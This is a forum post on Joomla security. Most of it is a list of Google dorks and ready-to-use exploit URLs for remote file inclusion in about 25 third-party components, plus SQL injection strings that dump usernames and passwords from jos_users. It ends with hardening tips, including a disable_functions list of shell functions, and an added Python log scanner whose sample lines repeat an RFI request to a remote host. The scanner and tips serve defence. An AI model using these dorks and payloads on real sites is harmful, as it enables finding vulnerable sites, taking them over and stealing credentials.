ToXiC | Moderator | Joined: Dec 01, 2004 | Posts: 181 | Location: Cyprus
Joomla, by itself, is considered a "secure CMS". Now, with version 1.0.13, they also gave emphasis to the md5 function and updated it to a salted md5 function:
$row->password = trim($row->password);   // strip surrounding whitespace from the plaintext
$salt = mosMakePassword(16);             // 16 random characters
$crypt = md5($row->password.$salt);      // hash the password with the salt appended
$row->password = $crypt.':'.$salt;       // stored as "hash:salt"
where the salt is a random 16-character string.
BUT:
DO NOT INSTALL ANY COMPONENT THAT YOU DON'T CONSIDER SECURE OR THAT ISN'T FROM A LEGIT RESOURCE.
Here are some vulnerabilities in various components of Joomla:
(dork = Google search string to find sites that have that component)
(shell = a PHP shell script that is located on another site)
Dork:
com_comprofiler
Expl:
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:com_multibanners
Expl:
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:com_colophon
Expl:
administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=[Shell]
inurl:index.php?option=[Shell]com_simpleboard
Expl:
/components/com_simpleboard/file_upload.php?sbp=[Shell]
Dork:
inurl:"com_hashcash"
Expl:
/components/com_hashcash/server.php?mosConfig_absolute_path=[Shell]
-
Dork:
inurl:"com_htmlarea3_xtd-c"
Expl:
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=[Shell]
-
Dork:
inurl:"com_sitemap"
Expl:
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=[Shell]
--
Dork:
inurl:"com_forum"
Expl:
/components/com_forum/download.php?phpbb_root_path=[Shell]
--
Dork:
inurl:"com_pccookbook"
Expl:
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:index.php?option=[Shell]com_extcalendar
Expl:
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:"minibb"
Expl:
/components/minibb/index.php?absolute_path=[Shell]
-
Dork:
inurl:"com_smf"
Expl:
/components/com_smf/smf.php?mosConfig_absolute_path=[Shell]
Expl:
/modules/mod_calendar.php?absolute_path=[Shell]
Dork:
inurl:"com_pollxt"
Expl:
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:"com_loudmounth"
Expl:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=[Shell]
-
Dork:
inurl:"com_videodb"
Expl:
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:index.php?option=[Shell]com_pcchess
Expl:
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:"com_multibanners"
Expl:
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:"com_a6mambohelpdesk"
Expl:
/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=[Shell]
Dork:
inurl:"com_colophon"
Expl:
/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:"com_mgm"
Expl:
/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:"com_mambatstaff"
Expl:
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:"com_securityimages"
Expl:
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=[Shell]
Expl:
/components/com_securityimages/lang.php?mosConfig_absolute_path=[Shell]
Dork:
inurl:"com_artlinks"
Expl:
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=[Shell]
-
Dork:
inurl:"com_galleria"
Expl:
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=[Shell]
SQL INJECTION
Joomla Component NeoRecruit
Dork:
inurl:index.php?option=com_NeoRecruit
Expl:
//index.php?option=com_neorecruit&task=offer_view&id=9999
9999999%20union%20select%201,concat(char(117,115,101,114,110,97,1
09,101,5Cool,username,char(32,112,97,115,115,119,111,114,100,5Cool,pa
ssword),3,4,5,6,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4
,5,0%20from%20jos_users/*
Joomla Component com_gmaps
Dork:
"index.php?option=com_gmaps"
Expl:
index.php?option=com_gmaps&task=viewmap&Itemid=57&map
Id=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/fr
om/**/jos_users/*
There are a lot more.. So BE careful about the components that you install on your Joomla site..
SOLUTIONS:
1) Modify the .htaccess file and PHP settings accordingly:
block IPs on specific folders like administrator etc.
use php.ini and add lines like these:
allow_url_fopen = Off
disable_functions = show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open, tempnam
believe me, this will increase your site security by 50%
Secure your configuration.php
2) chmod the configuration.php file so it is not viewable by everyone; 644 will do
3) Use components from the Joomla site for your security
http://extensions.joomla.org/index.php?option=com_mtree&task=listcats&cat_id=1802&Itemid=35
or
http://help.joomla.gr/index.php?option=com_content&task=view&id=51&Itemid=2&limit=1&limitstart=5
This article will be updated soon..
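From a defender's side, the two request shapes in the post's list (an include-path parameter such as mosConfig_absolute_path pointing at a remote URL, and a UNION SELECT against jos_users) are easy to spot in the web server's access log. The following is an added example, not ToXiC's or Joomla's code; it assumes Apache combined log format, and the log lines and IP addresses are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Query-string parameters that the listed components use as include paths.
RFI_PARAMS = {
    "mosConfig_absolute_path", "mosConfig_live_site",
    "absolute_path", "phpbb_root_path", "sbp",
}
# A remote URL in one of those parameters is only useful when allow_url_fopen is On.
REMOTE_RE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)
# UNION ... SELECT with optional /**/ comment padding, as in the com_gmaps string.
SQLI_RE = re.compile(r"union\s*(/\*.*?\*/)?\s*select", re.IGNORECASE)

# Constructed sample access-log lines (Apache combined format), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Dec/2007:10:00:01 +0000] "GET /index.php?option=com_content&task=view&id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Dec/2007:10:00:02 +0000] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://198.51.100.9/x.txt HTTP/1.1" 200 340 "-" "curl/7.16"
203.0.113.7 - - [01/Dec/2007:10:00:03 +0000] "GET /index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/* HTTP/1.1" 200 2100 "-" "curl/7.16"
203.0.113.9 - - [01/Dec/2007:10:00:04 +0000] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=/var/www/html HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def classify_request(target):
    """Return finding tags for one request target (path plus query string)."""
    findings = []
    parts = urlsplit(target)
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # Local paths in these parameters are not flagged here; only remote URLs are.
        if name in RFI_PARAMS and REMOTE_RE.match(value):
            findings.append(f"rfi:{name}")
    if SQLI_RE.search(unquote_plus(parts.query)):
        findings.append("sqli:union-select")
    return findings

def scan_log(text):
    """Return (client ip, script path, tags) for every flagged request in the log."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        tags = classify_request(m["target"])
        if tags:
            hits.append((m["ip"], m["target"].split("?")[0], tags))
    return hits

if __name__ == "__main__":
    for ip, path, tags in scan_log(SAMPLE_LOG):
        print(ip, path, ",".join(tags))
```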